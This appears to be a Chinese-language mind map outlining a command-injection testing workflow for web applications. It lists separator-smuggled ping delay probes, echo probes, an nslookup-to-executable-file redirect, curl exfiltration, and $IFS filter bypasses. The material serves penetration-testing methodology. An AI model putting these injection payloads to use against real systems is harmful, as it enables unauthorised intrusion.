Please enable JavaScript.
Coggle requires JavaScript to display documents.
远程注入命令-测试流程图 (查看命令执行结果 (当域名错误,返回错误信息时可能存在漏洞 (nslookup "[code]"…
远程注入命令-测试流程图
查看命令执行结果
使用curl命令将请求导入另一个服务器
当域名错误,返回错误信息时可能存在漏洞
nslookup "[code]" > [/path/executable_file]
检测是否有回显
时间推迟判断
防过滤检测
%0a ping -i 30 127.0.0.1 %0a
' ping 127.0.0.1 '
; ping 127.0.0.1 ;
& ping -n 30 127.0.0.1 &
& ping -i 30 127.0.0.1 &
| ping -n 30 127.0.0.1 |
30秒的时间延迟
|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
确定延迟不是由其它异常情况导致
更改–n或–i参数的值
查看返回值
测试payload
echo%20111111
response.write%20111111
;echo%20111111
:response.write%20111111
如果字符串111111被单独返回,就表示应用程序可能容易受到脚本命令注入
UNIX平台绕过空格
包含空白符字段分隔符的$IFS环境变量代替空格
测试phpinfo()